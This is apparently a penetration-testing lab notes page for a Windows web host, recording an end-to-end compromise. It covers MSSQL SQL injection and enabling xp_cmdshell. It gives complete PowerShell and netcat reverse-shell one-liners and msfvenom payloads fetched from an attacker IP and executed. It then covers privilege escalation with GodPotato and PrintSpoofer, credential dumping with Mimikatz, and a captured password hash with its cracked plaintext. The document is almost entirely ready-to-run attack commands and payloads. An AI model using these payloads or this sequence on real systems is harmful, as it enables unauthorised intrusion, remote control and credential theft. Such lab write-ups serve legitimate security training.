192.168.174.121 (WEB02)

Flags Obtained

Local:
    None
    
Root:
    1cef898bdfecd3e713dcefcd60869ef9

Enumeration

sudo nmap -sV -sC -sT -T4 -A -p- --open 192.168.174.121 -Pn -o target.121map

crackmapexec winrm 192.168.174.121
crackmapexec smb 192.168.174.121

gobuster dir -u http://192.168.174.121/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -x php,txt,xml,asp,aspx -t 42 -b 400,401,403,404 -f -o target.121gobuster

Exploitation

' ORDER BY 8 -- //
' ORDER BY 3 -- //
' ORDER BY 2 -- //

%27%20ORDER%20BY%208%20--%20%2F%2F
%27%20ORDER%20BY%203%20--%20%2F%2F
%27%20ORDER%20BY%202%20--%20%2F%2F

' UNION SELECT null, database() -- //
' UNION SELECT null, null, user() -- //
' UNION SELECT null, null, @@version -- //

%27%20UNION%20SELECT%20null%2C%20database%28%29%20--%20%2F%2F
%27%20UNION%20SELECT%20null%2C%20null%2C%20user%28%29%20--%20%2F%2F
%27%20UNION%20SELECT%20null%2C%20null%2C%20%40%40version%20--%20%2F%2F

Attempt Manual Code Execution

'; EXEC sp_configure "show advanced options", 1; -- //
'; RECONFIGURE; -- //
'; EXEC sp_configure "xp_cmdshell", 1; -- //
'; RECONFIGURE; -- //

'; EXEC xp_cmdshell "whoami"; -- //
'; EXEC xp_cmdshell "whoami /priv"; -- //
'; EXEC xp_cmdshell "dir C:\Users"; -- //

'; EXEC xp_cmdshell "ping 192.168.45.165"; -- //

'; EXEC sp_configure "show advanced options", 1; RECONFIGURE; EXEC sp_configure "xp_cmdshell", 1; RECONFIGURE; EXEC xp_cmdshell "ping 192.168.45.165"; -- //

%27%3B%20EXEC%20sp_configure%20%22show%20advanced%20options%22%2C%201%3B%20--%20%2F%2F
%27%3B%20RECONFIGURE%3B%20--%20%2F%2F
%27%3B%20EXEC%20sp_configure%20%22xp_cmdshell%22%2C%201%3B%20--%20%2F%2F
%27%3B%20RECONFIGURE%3B%20--%20%2F%2F

%27%3B%20EXECUTE%20xp_cmdshell%20%22whoami%22%3B%20--%20%2F%2F
%27%3B%20EXEC%20xp_cmdshell%20%22whoami%20%2Fpriv%22%3B%20--%20%2F%2F
%27%3B%20EXEC%20xp_cmdshell%20%22dir%20C%3A%5CUsers%22%3B%20--%20%2F%2F

%27%3B%20EXEC%20xp_cmdshell%20%22ping%20192.168.45.165%22%3B%20--%20%2F%2F

%27%3B%20EXEC%20sp%5Fconfigure%20%22show%20advanced%20options%22%2C%201%3B%20RECONFIGURE%3B%20EXEC%20sp%5Fconfigure%20%22xp%5Fcmdshell%22%2C%201%3B%20RECONFIGURE%3B%20EXEC%20xp%5Fcmdshell%20%22ping%20192%2E168%2E45%2E165%22%3B%20%2D%2D%20%2F%2F

Only ping command works

Attempting one liner reverse shells

'; EXEC xp_cmdshell "<payload>"; -- //

'; EXEC xp_cmdshell "<$LHOST = '192.168.45.165'; $LPORT = 4444; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write('$Output`n'); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()>"; -- //

'; EXEC xp_cmdshell "powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient("192.168.45.165",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"'; -- //

%27%3B%20EXEC%20xp%5Fcmdshell%20%22%3C%24LHOST%20%3D%20%27192%2E168%2E45%2E165%27%3B%20%24LPORT%20%3D%204444%3B%20%24TCPClient%20%3D%20New%2DObject%20Net%2ESockets%2ETCPClient%28%24LHOST%2C%20%24LPORT%29%3B%20%24NetworkStream%20%3D%20%24TCPClient%2EGetStream%28%29%3B%20%24StreamReader%20%3D%20New%2DObject%20IO%2EStreamReader%28%24NetworkStream%29%3B%20%24StreamWriter%20%3D%20New%2DObject%20IO%2EStreamWriter%28%24NetworkStream%29%3B%20%24StreamWriter%2EAutoFlush%20%3D%20%24true%3B%20%24Buffer%20%3D%20New%2DObject%20System%2EByte%5B%5D%201024%3B%20while%20%28%24TCPClient%2EConnected%29%20%7B%20while%20%28%24NetworkStream%2EDataAvailable%29%20%7B%20%24RawData%20%3D%20%24NetworkStream%2ERead%28%24Buffer%2C%200%2C%20%24Buffer%2ELength%29%3B%20%24Code%20%3D%20%28%5Btext%2Eencoding%5D%3A%3AUTF8%29%2EGetString%28%24Buffer%2C%200%2C%20%24RawData%20%2D1%29%20%7D%3B%20if%20%28%24TCPClient%2EConnected%20%2Dand%20%24Code%2ELength%20%2Dgt%201%29%20%7B%20%24Output%20%3D%20try%20%7B%20Invoke%2DExpression%20%28%24Code%29%202%3E%261%20%7D%20catch%20%7B%20%24%5F%20%7D%3B%20%24StreamWriter%2EWrite%28%27%24Output%60n%27%29%3B%20%24Code%20%3D%20%24null%20%7D%20%7D%3B%20%24TCPClient%2EClose%28%29%3B%20%24NetworkStream%2EClose%28%29%3B%20%24StreamReader%2EClose%28%29%3B%20%24StreamWriter%2EClose%28%29%3E%22%3B%20%2D%2D%20%2F%2F

%27%3B%20EXEC%20xp%5Fcmdshell%20%22powershell%20%2Dnop%20%2Dc%20%22%24client%20%3D%20New%2DObject%20System%2ENet%2ESockets%2ETCPClient%28%22192%2E168%2E45%2E165%22%2C4444%29%3B%24stream%20%3D%20%24client%2EGetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200%2E%2E65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream%2ERead%28%24bytes%2C%200%2C%20%24bytes%2ELength%29%29%20%2Dne%200%29%7B%3B%24data%20%3D%20%28New%2DObject%20%2DTypeName%20System%2EText%2EASCIIEncoding%29%2EGetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out%2DString%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%22PS%20%22%20%2B%20%28pwd%29%2EPath%20%2B%20%22%3E%20%22%3B%24sendbyte%20%3D%20%28%5Btext%2Eencoding%5D%3A%3AASCII%29%2EGetBytes%28%24sendback2%29%3B%24stream%2EWrite%28%24sendbyte%2C0%2C%24sendbyte%2ELength%29%3B%24stream%2EFlush%28%29%7D%3B%24client%2EClose%28%29%22%27%3B%20%2D%2D%20%2F%2F

No response

Attempted uploading msfvenom reverse shell payload

No response from listener

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.165 LPORT=443 -f exe > rev1.exe
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.165 LPORT=443 -f exe > rev2.exe

'; EXEC xp_cmdshell "curl http:// 192.168.45.165/rev1.exe -o C:\\Users\\Public\\rev1.exe"; -- //
'; EXEC xp_cmdshell "C:\\Users\\Public\\rev1.exe"; -- //

'; EXEC xp_cmdshell "curl http:// 192.168.45.165/rev2.exe -o C:\\Users\\Public\\rev2.exe"; -- //
'; EXEC xp_cmdshell "C:\\Users\\Public\\rev2.exe"; -- //

%27%3B%20EXEC%20xp_cmdshell%20%22curl%20http%3A%2F%2F%20192.168.45.165%2Frev1.exe%20-o%20C%3A%5C%5CUsers%5C%5CPublic%5C%5Crev1.exe%22%3B%20--%20%2F%2F

%27%3B%20EXEC%20xp_cmdshell%20%22C%3A%5C%5CUsers%5C%5CPublic%5C%5Crev1.exe%22%3B%20--%20%2F%2F

%27%3B%20EXEC%20xp_cmdshell%20%22curl%20http%3A%2F%2F%20192.168.45.165%2Frev2.exe%20-o%20C%3A%5C%5CUsers%5C%5CPublic%5C%5Crev2.exe%22%3B%20--%20%2F%2F

%27%3B%20EXEC%20xp_cmdshell%20%22C%3A%5C%5CUsers%5C%5CPublic%5C%5Crev2.exe%22%3B%20--%20%2F%2F

Attempting Script Payload

'; EXEC xp_cmdshell "curl http://192.168.45.165/nc64.exe -o C:\\Users\\Public\\nc64.exe"; -- //
'; EXEC xp_cmdshell "curl http://192.168.45.165/powercat.ps1 -o C:\\Users\\Public\\powercat.ps1"; -- //

'; EXEC xp_cmdshell "C:\\Users\\Public\\nc64.exe 192.168.45.165 443 -e cmd.exe"; -- //
'; EXEC xp_cmdshell "C:\\Users\\Public\\powercat -c 192.168.45.165 -p 443 -e cmd.exe"; -- //

'; EXEC sp_configure "show advanced options", 1; RECONFIGURE; EXEC sp_configure "xp_cmdshell", 1; RECONFIGURE; EXEC xp_cmdshell "curl http://192.168.45.165/nc64.exe -o C:\\Users\\Public\\nc64.exe"; EXEC xp_cmdshell "C:\\Users\\Public\\nc64.exe 192.168.45.165 443 -e cmd.exe"; -- //

%27%3B%20EXEC%20xp%5Fcmdshell%20%22curl%20http%3A%2F%2F192%2E168%2E45%2E165%2Fnc64%2Eexe%20%2Do%20C%3A%5C%5CUsers%5C%5CPublic%5C%5Cnc64%2Eexe%22%3B%20%2D%2D%20%2F%2F
%27%3B%20EXEC%20xp%5Fcmdshell%20%22curl%20http%3A%2F%2F192%2E168%2E45%2E165%2Fpowercat%2Eps1%20%2Do%20C%3A%5C%5CUsers%5C%5CPublic%5C%5Cpowercat%2Eps1%22%3B%20%2D%2D%20%2F%2F

%27%3B%20EXEC%20xp%5Fcmdshell%20%22C%3A%5C%5CUsers%5C%5CPublic%5C%5Cnc64%2Eexe%20192%2E168%2E45%2E165%20%2Dp%20443%20%2De%20cmd%2Eexe%22%3B%20%2D%2D%20%2F%2F
%27%3B%20EXEC%20xp%5Fcmdshell%20%22C%3A%5C%5CUsers%5C%5CPublic%5C%5Cpowercat%20%2Dc%20192%2E168%2E45%2E165%20%2Dp%20443%20%2De%20cmd%2Eexe%22%3B%20%2D%2D%20%2F%2F

%27%3B%20EXEC%20sp%5Fconfigure%20%22show%20advanced%20options%22%2C%201%3B%20RECONFIGURE%3B%20EXEC%20sp%5Fconfigure%20%22xp%5Fcmdshell%22%2C%201%3B%20RECONFIGURE%3B%20EXEC%20xp%5Fcmdshell%20%22curl%20http%3A%2F%2F192%2E168%2E45%2E165%2Fnc64%2Eexe%20%2Do%20C%3A%5C%5CUsers%5C%5CPublic%5C%5Cnc64%2Eexe%22%3B%20EXEC%20xp%5Fcmdshell%20%22C%3A%5C%5CUsers%5C%5CPublic%5C%5Cnc64%2Eexe%20192%2E168%2E45%2E165%20443%20%2De%20cmd%2Eexe%22%3B%20%2D%2D%20%2F%2F

Initial Access

whoami
whoami /groups
whoami /priv

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Domain" /C:"Network Card"
ipconfig

where /r C:\Users\ *.txt

Privilege Escalation

Identified SeImpersonatePrivilege with whoami /priv

Using God Potato to get a root reverse shell

reg query "HKLM\SOFTWARE\Microsoft\Net Framework Setup\NDP" /s
    # Run to identify .NET framework version

On Kali machine:
    wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe

On Victim machine:
    curl http://192.168.45.239/GodPotato-NET4.exe -o C:\Users\Public\Documents\GodPotato.exe

On Kali machine:
    nc -nlvp 446

On Victim machine:
    GodPotato -cmd "whoami"
    GodPotato -cmd "nc64.exe 192.168.45.165 446 -e cmd"

Using PrintSpoofer to get a local root shell

On Kali machine:
    wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
    wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer32.exe
  
On Victim machine:
    curl http://192.168.45.239/PrintSpoofer64.exe -o C:\Users\Public\Documents\PrintSpoofer64.exe

  C:\Users\Public\Documents\PrintSpoofer64.exe -i -c <command>
        # Execute a Command as root

whoami
whoami /groups
whoami /priv

where /r C:\Users local.txt
where /r C:\Users proof.txt
type C:\Users\Administrator\Desktop\proof.txt

Admin Enumeration

WinPeas

On Kali machine:
    wget https://github.com/peass-ng/PEASS-ng/releases/download/20250106-5a706ae2/winPEASx64.exe


On Victim machine:
    curl http://192.168.45.165/winPEASx64.exe -o winPEASx64.exe
    winPEASx64.exe

Mimikatz

On Kali machine:
    wget https://github.com/ParrotSec/mimikatz/blob/master/x64/mimikatz.exe

On Victim machine:
    curl http://192.168.45.165/mimikatz.exe -o mimikatz.exe
    mimikatz.exe
    
    privilege::debug
    sekurlsa::logonpasswords

Username

Hash

Password

Joe

08d7a47a6f9f66b97b1bae4178747494

Flowers1

hashcat -m 1000 "08d7a47a6f9f66b97b1bae4178747494" ../rockyou.txt --force --show

Previous192.168.174.120 (WEB01)Next192.168.174.122 (VPN)

Last updated 1 year ago

hashtagEnumeration

hashtagExploitation

hashtagInitial Access

hashtagPrivilege Escalation

hashtagUsing God Potato to get a root reverse shell

hashtagUsing PrintSpoofer to get a local root shell

hashtagAdmin Enumeration

hashtagWinPeas

hashtagMimikatz